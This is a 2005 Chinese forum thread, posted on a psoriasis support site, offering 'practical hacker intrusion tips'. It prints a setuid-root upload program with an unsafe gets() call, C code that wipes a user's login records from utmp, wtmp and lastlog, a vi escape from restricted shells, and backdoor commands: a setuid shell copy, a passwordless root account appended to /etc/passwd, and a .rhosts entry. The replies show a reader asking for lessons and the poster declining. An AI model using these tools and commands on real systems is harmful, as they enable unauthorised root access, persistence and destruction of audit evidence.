银屑病病友互助网

标题: 黑客入侵实用技巧7则 [打印本页]

作者: 人生 时间: 2005-8-5 08:50
标题: 黑客入侵实用技巧7则
、UPLOAD 
<

>侵入成功后，拿到root权限了，这个东东可以把他的服务器的访问权限改了，让任何人都可以上传文件 !
root 状态下, 运行 Install 后,
upload 将允许普通用户上载文件至任何目录下。
# chmod 755 install
#./install
$ more install
#! /bin/csh -f
cc upload.c
cp a.out upload
chown root upload
chmod 755 upload
chmod u+s upload
$ more upload.c
#include
main()
{
char filename[48];
printf( "This program will upload up.txt ASCII file to specified file\n" );
printf( "XXX Copyright Reserved\n" );
printf( "Where to upload (include path and filename)? " );
gets( filename );
upload( filename );
}
int upload( filename )
char *filename;
{
FILE *fp,*outp;
char c;
fp=fopen( "up.txt","r" );
outp=fopen( filename,"w" );
if( fp== NULL ) {
printf( "file not exist." );
return 0;
}
for( ;; ) {
c= fgetc( fp );
if feof( fp ) break;
printf( "%c",c );
fputc( c, outp );
}
fclose( fp );
fclose( outp );
return 1;
} 
<

>2、破坏现场 
<

>
<

>进入系统后，出来以前怎么破坏现场？抹掉自己的脚印?
<

>编辑 /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog.
请使用专门的编辑器
<

>例子:
<

>#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
<

>int f;
<

>void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
<

>if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
3、突破SHELL
许多攻击系统的方法都需要攻击者首先有一个命令行式的Shell,如 /bin/csh 。但有些系统提供给用户的却是菜单式的定制Shell,如 pink 。所以如果你想攻击这个系统的话，首先必须要冲破这个定制shell。
我们可以利用 vi (UNIX中标准的编辑器) 的一些命令来达到这个目的。具体过程如下：
(1).在定制Shell中选择编辑文件，这时系统启动 vi。
(2).在 vi 中，输入以下命令序列

注意：输入的命令包括最前面的 ':' )
:set shell=/bin/csh
:shell
3.这时，就像在DOS程序的File菜单中选择Dos Shell菜单项一样，系统启动一个Shell，而这个Shell刚刚被我们设定成 /bin/csh，因此我们就得到了一个命令行式的Unix Shell。
4、后门
进入一个系统以后随手留下一个后门确实是很好的习惯

这里介绍几种简单的后门设置方法:
(1). setuid
#cp /bin/sh /tmp/.backdoor
#chmod u+s /tmp/.backdoor
加上 suid 位到shell 上，最为简单方便.
(2). echo "wyj::0:0::/:/bin/csh" >> /etc/passwd
即给系统增加一个 id 为 0（root)的帐号，无口令.
(3). echo "+ wyj">>/.rhosts
即本地的名为wyj的用户可以直接 rlogin target 无须口令此时的wyj就相当于口令，不知道的人是不能进去的.前提是目标的port 512or513or514 opening.

作者: 大圣 时间: 2005-8-5 17:14
要是能够给我们这些电脑菜鸟系统一些讲解就好了。

作者: 人生 时间: 2005-8-6 09:03
标题: 回复：（人生）黑客入侵实用技巧7则
<

> 对不起这位朋友，我不能在这上教这些东西，关于我发的这些东西要是有明白能看懂的就看看了，因为一开始的时候我想在这里教大家一些这方面的知识了，也发过帖子，看大家喜欢这方面的少，在一个大家就对那个网站被黑或QQ被盗方面的比较赶兴趣。
<

> 在一个教这方面的问题这网站的技术人员以前也说过不让发教程一类的东西，请你理解，一些简单的盗QQ我也不能教，所以有的朋友号丢了，我也就是告诉他们不会的使一些现成的软件自己拿回来就好了。
<

> 我发的一些信息几乎是最新的消息了，所以要我详细的讲解我不可能我也不想教了。
<

> 很高兴你能来这版快来看电脑知识的帖子，希望这里能有你需要的东西。

欢迎光临银屑病病友互助网 (https://www.yxb365.com/)